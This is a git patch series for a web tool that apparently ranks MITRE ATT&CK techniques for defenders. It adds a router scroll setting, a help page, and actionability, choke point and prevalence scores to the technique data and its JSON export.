z!7wibp!@Ckhi=hRv*Rsli?Ufri8XKcU1*6%{EeNP685(QOdDoYvXMZ5-}pIhuG`R}
zkkNeoa%FUH;?MKjL7a0y{FA|fF%GI=<@|#>2=4Pfrjt`9rRNRQUuI~<($GF@HPURa
zPTv-1WWt1SVsNLOagX0#9_})AE7RQtwdy4}B5NnSE-y8msWfIl#R!046v`Zp{Z~Yd
z)u8RaB5G)9s-blkR1EiB!3}JsC>T0=^BV}fZm3(ZBbGpKBmYExgQ){A(yv?(fN(rIhBabRZ}K6T~1YID?3
zt}>frS-=xS`?koGIB;PYA+FMoU4VSI
z&)hf}c3WktQ?AX%Y3;kZy8tzvRFoHY6QB^pHMfP`vqbt>KrqM~5
zDbw~3RjC!+top}t?PR8Rqp;_o`?Z@E=Y-nqVjzrPkNI!>8(P9^$)T5{0i8Rlva=_B
zaeZaF&c331zue{%dSWI?0~t^CG0UsX_Gp*2X&KToC%kK6d_!{S*>L=4hz3fWDN`sV
zkX6avpjx*n@;Gb^$gIMBT^#w?)=$<>h4mo2^qZutkbxAjBwr!1vv$Dxg&*hVxsK%!L`k@>9PiLaz`j9DQ>~ss#YZJ
zG<&dg!6Tk5wfO-G&+>|<*)ND?{IQFc8cfZz_1VviFQGWCcOJLRr|J5x)#xN^<<5X=
z5Z4t>Kry67B(`+zg*Q@V!Lk$~ZvhCy*jd(dXAe%5BckTv<+}_Md_Wqt#_&nMBXG{BKG3$h-60sDwqgXh(S*H1GVi|l;3_Z0fRo|g6r&j9jU6@Mr
ziW6CPYsIp^&>$sWrK6KD;@5w=CPHBTdLoA7m1YXJ)P(*mIIAO7)>v>=lHG4BNmGoo
z!z2kYj}4JvB^o&=RJlyvN*im};V7THnz=>(4C{ysk9Hv+{T(f=MYE^Pd+#!jEb$~vtXm}jX<
zrXRy-itK4j
z_EI&pKTRd#eCF%vSZ%=EINf3@vuk&v=&SkIHgzWivzi6-48~%bqMX-P4FOtPD2CnC
zITVk%a5B)qgWy0B5G__s%fImfVT_jPiLlrBOc(Pv^oBhME-?#S>>RYkp>J5^A`#Ob
zw}6H7`fVv9&rMdx;A?ngsOW}93>2WoN;pe9h*%sd2drzCKT!YFO1Oa&~j{;M%YQiraho=}Fgq#r!A0oDm4wO-L+1i6;`aUkGDe>|0VJ+zlZ|5UQG>M%s25vLsW
zNN8;q13Kv4z!-*^&ka(`2oSVii7VkRi+cU-yVIbW)DsMV`SCYpH=}vpz*vGK2lv@B
zQPizY?wg-Lt_E=dUHPwrM+qQSeW@OWgU`AsH{$LR`=+cb&rcxlJ1HcjqRtg7?bmk)
zkS}ewVEGH6VrwD3PGs*M=HE4|q89jlr!))%Aurh4AwzwHZ|4``3_qT7geSctYdR-Z
zPvW(|Ix(KYMju~gZ+(8SYfu|F=;7k0rC{}X*OyB?x;+2|M-XX6&}x=5eq(+~jRxM+
z{c1UgAGz*YQKy`bt@@k#;fH2-mvxgSv$0&6+u#b0NJUbF@ZqwMiRAN?bD`SVL{B05PXy8Q0xI|1}r?NSHIYMfj(pD~W?
zcO|~L1s})WlJ5wYY4N6o6?%M6P3AWGxcJh6YWgRcAPrd1A+lUPEXpG&a>t3!n@gFA
zZLU9hsMNR*%oS@qgl|-a9)U|Do>*TCV0^YE#uk%f{@V`qd|~CT55C^L251(mi<>mI
z$3xUaIJaalk_?qRp9Y?n==g8136PPv+mdT?B2`}YnDomH@h;BIOsNkHdI1@bOcD`q
z{}oSIx{~n0)Xd&g_FX#T+1aK?+dj2=b}^XQ3@6O*fg!U`@>-WhHUM7Rl1cB?GYL&mar6Ro4e92mkESh!+4nbd4X$KL*XV?sW%xl*G;Ec^wZY^VXhwyO
zXDYTKPc)?H7ziIqldygSgAyc(c9&qiXqRN($~iI~xPbO427TCU%!E~G!`*iM!Gy2z
zhBTWsWj*O%czCzeFOFEq}8+|)LENnou%$8#_bs^02xl34izwu&f
zBg6u__GJ&X3GuJ?U){d9cR=pS^d#z3Rh8G%7TJqWV65T=8z(D7(RPl-!%D&xl}MVS
z8@2Ypi}g4X4R(6=-i_iRcN;s%dxJ6U
zXbX~D?~KWU<+;^F4c&HM(NB{4_km4uERFpt{UH)zPOp)Ilq1OmB-a@&wPxE!12u4@%H^i>1C$htMJpodAW%
z862Q_F4rSh{4W-Kb78@}QqOVdn}umtdF7yzUUex8agZAn^EuS+Gj-U3?;J=##iT^+
zMu-N=28l4;VfYF$dR3_H^2G*}TM$-Th7~!7S{y|?(Bq&dEG%rIVvh7VXQV$8jyaC3
zKHRDDm@)-X+x?LWzKiog)A|dMN-2Ny;?xaETGQr>jJ`CgB9@!}+?Wx2WUFlt8mBBm+>pt9RCk;TjI+Fw!YY!Y
znVo&FIVhw2^OD%6`4xSG1Cd%X=}d)@$MxCK#-!w7(*k5*jXQF;<8zq}=`TSfzgXYN
zv@+qACdVc&`-$fg>bENw%U8=ihl}dZrdGk761{Ai(b+;#&5skg{J;cb1K
z%aPxN=P6!cxM|KGtVu(zH`sKr4I)-1tCAqOIj{{E?407adbQ4~7HO##b;sI+m+oPq
zV5W06Ptew%tIOg#RC!S{ce^ZjACA>mPX>;71_cd^h)Ge7>Ju*yr~NhvLi>AxsQ1&F
z8$8V78@ws9KbHC7U>3uFmT?UJdrRPlKFx5jMa^9`l7DRj>`m0WbqN->s4Y#2l=AnE
zo)%`;K-EjTfrT+%``o=&y}_FWk}+E#J}7c6(~p-#WZg+1TKm>71w`u
z4<w~H
zzw4~l^_kIyd%qbSGMsKkGzW*0lqv{g?

literal 0
HcmV?d00001

diff --git a/src/router/index.ts b/src/router/index.ts
index a17bd05..6dc8e15 100644
--- a/src/router/index.ts
+++ b/src/router/index.ts
@@ -41,6 +41,10 @@ const routes = [
 const router = createRouter({
   history: createWebHistory(import.meta.env.BASE_URL),
   routes: routes,
+  scrollBehavior() {
+    // always scroll to top when linking to a new page
+    return { top: 0 };
+  },
 });
 
 export { router };
diff --git a/src/views/HelpPage.vue b/src/views/HelpPage.vue
index 1ac55a6..697332f 100644
--- a/src/views/HelpPage.vue
+++ b/src/views/HelpPage.vue
@@ -1,7 +1,130 @@
 
 
 
 
-
+

From 29c680160cb4f298618bf159d7d6eea7f907388e Mon Sep 17 00:00:00 2001
From: Allison Robbins 
Date: Tue, 28 May 2024 16:23:34 -0400
Subject: [PATCH 08/21] TAT-145 Top 10 JSON export format (#16)

* feat(TAT-145): remove some technique elements (supertechnique, cumulative_score, etc.) to optimize json export on calculator page

* feat(TAT-145): structure json export

* feat(TAT-97): add actionability, choke point, and prevalence scores to technique metadata

* feat(TAT-97): add prevalence, actionability, and choke point scores to JSON export

---------

Co-authored-by: arobbins 
---
 scripts/update_techniques.js     |   4 +
 src/components/TopTenDetails.vue |  48 +-
 src/data/DataTypes.ts            |  28 +
 src/data/Techniques.json         | 923 ++++++++++++++++++++++++-------
 src/views/TopTenResults.vue      |  29 +-
 5 files changed, 822 insertions(+), 210 deletions(-)

diff --git a/scripts/update_techniques.js b/scripts/update_techniques.js
index 59816b0..5119793 100644
--- a/scripts/update_techniques.js
+++ b/scripts/update_techniques.js
@@ -124,6 +124,10 @@ const DESTINATION_FILE = "src/data/Techniques.json";
         technique.file_coverage = !!parseInt(r.getCell(35).value.result);
         technique.cloud_coverage = !!parseInt(r.getCell(37).value.result);
         technique.hardware_coverage = !!parseInt(r.getCell(39).value.result);
+
+        technique.actionability_score = r.getCell(22).value.result;
+        technique.choke_point_score = r.getCell(8).value.result;
+        technique.prevalence_score = r.getCell(13).value;
       }
     }
   });
diff --git a/src/components/TopTenDetails.vue b/src/components/TopTenDetails.vue
index b8a2ba5..2039b4f 100644
--- a/src/components/TopTenDetails.vue
+++ b/src/components/TopTenDetails.vue
@@ -35,27 +35,33 @@
                 
             
         
-        
Mitigations

-        
    
-            
  • 
-                
    
-                    {{ mitigation.mid }} - {{ mitigation.name }}
-                
    
-                
    {{ mitigation.description }}
    
-            
    • 
-        

-        
Detections

-        

-            {{ this.technique.detection }}
-        

-        
References

-        
+        

+            
Mitigations

+            
    
+                
  • 
+                    
    
+                        {{ mitigation.mid }} - {{ mitigation.name }}
+                    
    
+                    
    {{ mitigation.description }}
    
+                
    • 
+            

+        

+        

+            
Detections

+            

+                {{ this.technique.detection }}
+            

+        

+        

+            
References

+            
+        

     
 
 
diff --git a/src/data/DataTypes.ts b/src/data/DataTypes.ts
index 3a950a3..667c452 100644
--- a/src/data/DataTypes.ts
+++ b/src/data/DataTypes.ts
@@ -24,6 +24,14 @@ export interface Technique {
   file_coverage: boolean;
   cloud_coverage: boolean;
   hardware_coverage: boolean;
+  process_score: number;
+  network_score: number;
+  file_score: number;
+  cloud_score: number;
+  hardware_score: number;
+  actionability_score: number;
+  choke_point_score: number;
+  prevalence_score: number;
 }
 export interface Subtechnique {
   tid: string;
@@ -39,3 +47,23 @@ export interface Mitigation {
   description: string;
   url: string;
 }
+
+export interface ExportedTechnique {
+  rank: number;
+  tid: string;
+  name: string;
+  description: string;
+  url: string;
+  detection: string;
+  score: number;
+  process_score: number;
+  network_score: number;
+  file_score: number;
+  cloud_score: number;
+  hardware_score: number;
+  subtechniques: Array;
+  mitigations: Array;
+  actionability_score: number;
+  choke_point_score: number;
+  prevalence_score: number;
+}
diff --git a/src/data/Techniques.json b/src/data/Techniques.json
index ccca0a9..aecc43f 100644
--- a/src/data/Techniques.json
+++ b/src/data/Techniques.json
@@ -96,7 +96,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.08571428571428572,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.01157747
     },
     {
         "tid": "T1003",
@@ -490,7 +493,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.8333333333333334,
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.32699817
     },
     {
         "tid": "T1005",
@@ -549,7 +555,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.17142857142857143,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00266759
     },
     {
         "tid": "T1006",
@@ -583,7 +592,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.009523809523809523,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1007",
@@ -618,7 +630,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.023809523809523808,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1008",
@@ -673,7 +688,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.10476190476190476,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1010",
@@ -709,7 +727,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.009523809523809523,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1011",
@@ -786,7 +807,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.06666666666666667,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1012",
@@ -822,7 +846,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.07619047619047618,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.12907804
     },
     {
         "tid": "T1014",
@@ -858,7 +885,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.019047619047619046,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00087447
     },
     {
         "tid": "T1016",
@@ -905,7 +935,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.08095238095238096,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02451534
     },
     {
         "tid": "T1018",
@@ -943,7 +976,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.18095238095238095,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.01949044
     },
     {
         "tid": "T1020",
@@ -1000,7 +1036,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.057142857142857134,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00021153
     },
     {
         "tid": "T1021",
@@ -1286,7 +1325,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.4761904761904762,
+        "choke_point_score": 0.45,
+        "prevalence_score": 0.66605219
     },
     {
         "tid": "T1025",
@@ -1345,7 +1387,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.14285714285714285,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1027",
@@ -1465,7 +1510,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5714285714285714,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.77288591
     },
     {
         "tid": "T1029",
@@ -1519,7 +1567,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.09047619047619047,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1030",
@@ -1573,7 +1624,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.09523809523809523,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1033",
@@ -1609,7 +1663,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1952380952380952,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00046537
     },
     {
         "tid": "T1036",
@@ -1796,7 +1853,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.519047619047619,
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
     },
     {
         "tid": "T1037",
@@ -1944,7 +2004,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.18571428571428572,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.00706611
     },
     {
         "tid": "T1039",
@@ -1981,7 +2044,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.019047619047619046,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1040",
@@ -2050,7 +2116,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20952380952380953,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.02189928
     },
     {
         "tid": "T1041",
@@ -2124,7 +2193,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20952380952380953,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00072207
     },
     {
         "tid": "T1046",
@@ -2208,7 +2280,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.29523809523809524,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.01570808
     },
     {
         "tid": "T1047",
@@ -2295,7 +2370,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5333333333333333,
+        "choke_point_score": 0.65,
+        "prevalence_score": 1
     },
     {
         "tid": "T1048",
@@ -2488,7 +2566,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.419047619047619,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00182874
     },
     {
         "tid": "T1049",
@@ -2526,7 +2607,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.07619047619047618,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1052",
@@ -2638,7 +2722,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.2380952380952381,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1053",
@@ -2890,7 +2977,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5142857142857142,
+        "choke_point_score": 0.6,
+        "prevalence_score": 1
     },
     {
         "tid": "T1055",
@@ -3145,7 +3235,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.49523809523809526,
+        "choke_point_score": 0.44999999999999996,
+        "prevalence_score": 1
     },
     {
         "tid": "T1056",
@@ -3234,7 +3327,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.014285714285714284,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.25782564
     },
     {
         "tid": "T1057",
@@ -3271,7 +3367,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.04285714285714285,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.11777326
     },
     {
         "tid": "T1059",
@@ -3624,7 +3723,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.9142857142857143,
+        "choke_point_score": 1,
+        "prevalence_score": 1
     },
     {
         "tid": "T1068",
@@ -3726,7 +3828,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.5714285714285714,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00221982
     },
     {
         "tid": "T1069",
@@ -3797,7 +3902,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.14761904761904762,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02214451
     },
     {
         "tid": "T1070",
@@ -4001,7 +4109,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.6000000000000001,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.59605554
     },
     {
         "tid": "T1071",
@@ -4130,7 +4241,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1761904761904762,
+        "choke_point_score": 0.5,
+        "prevalence_score": 0.10491513
     },
     {
         "tid": "T1072",
@@ -4277,7 +4391,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5095238095238095,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00164997
     },
     {
         "tid": "T1074",
@@ -4332,7 +4449,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.47619047619047616,
+        "choke_point_score": 0.6000000000000001,
+        "prevalence_score": 0.10548938
     },
     {
         "tid": "T1078",
@@ -4542,7 +4662,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.8,
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.00772313
     },
     {
         "tid": "T1080",
@@ -4620,7 +4743,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.17142857142857143,
+        "choke_point_score": 0.30000000000000004,
+        "prevalence_score": 0.00028245
     },
     {
         "tid": "T1082",
@@ -4659,7 +4785,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.13333333333333333,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.447342
     },
     {
         "tid": "T1083",
@@ -4696,7 +4825,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.07142857142857142,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.0584645
     },
     {
         "tid": "T1087",
@@ -4815,7 +4947,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2714285714285714,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.10442914
     },
     {
         "tid": "T1090",
@@ -4953,7 +5088,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.24285714285714285,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 1
     },
     {
         "tid": "T1091",
@@ -5028,7 +5166,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.16666666666666669,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.19170357
     },
     {
         "tid": "T1092",
@@ -5094,7 +5235,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.14285714285714285,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1095",
@@ -5176,7 +5320,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2619047619047619,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 1
     },
     {
         "tid": "T1098",
@@ -5371,7 +5518,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.638095238095238,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00749729
     },
     {
         "tid": "T1102",
@@ -5500,7 +5650,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1523809523809524,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.03502902
     },
     {
         "tid": "T1104",
@@ -5555,7 +5708,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.00012692
     },
     {
         "tid": "T1105",
@@ -5612,7 +5768,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.49047619047619045,
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.69578581
     },
     {
         "tid": "T1106",
@@ -5669,7 +5828,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.16190476190476188,
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.24088032
     },
     {
         "tid": "T1110",
@@ -5870,7 +6032,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.46666666666666673,
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.00452135
     },
     {
         "tid": "T1111",
@@ -5925,7 +6090,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.09047619047619047,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
     },
     {
         "tid": "T1112",
@@ -5975,7 +6143,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5047619047619047,
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
     },
     {
         "tid": "T1113",
@@ -6011,7 +6182,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.047619047619047616,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.06137048
     },
     {
         "tid": "T1114",
@@ -6156,7 +6330,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2523809523809524,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0
     },
     {
         "tid": "T1115",
@@ -6192,7 +6369,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.03809523809523809,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1119",
@@ -6264,7 +6444,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2142857142857143,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00602063
     },
     {
         "tid": "T1120",
@@ -6300,7 +6483,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.014285714285714284,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00397872
     },
     {
         "tid": "T1123",
@@ -6336,7 +6522,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.03333333333333333,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1124",
@@ -6371,7 +6560,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.019047619047619046,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1125",
@@ -6406,7 +6598,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1127",
@@ -6493,7 +6688,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3142857142857143,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.03619713
     },
     {
         "tid": "T1129",
@@ -6543,7 +6741,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.07142857142857142,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00029615
     },
     {
         "tid": "T1132",
@@ -6627,7 +6828,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.08571428571428572,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.02480491
     },
     {
         "tid": "T1133",
@@ -6732,7 +6936,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.4285714285714286,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1134",
@@ -6887,7 +7094,10 @@
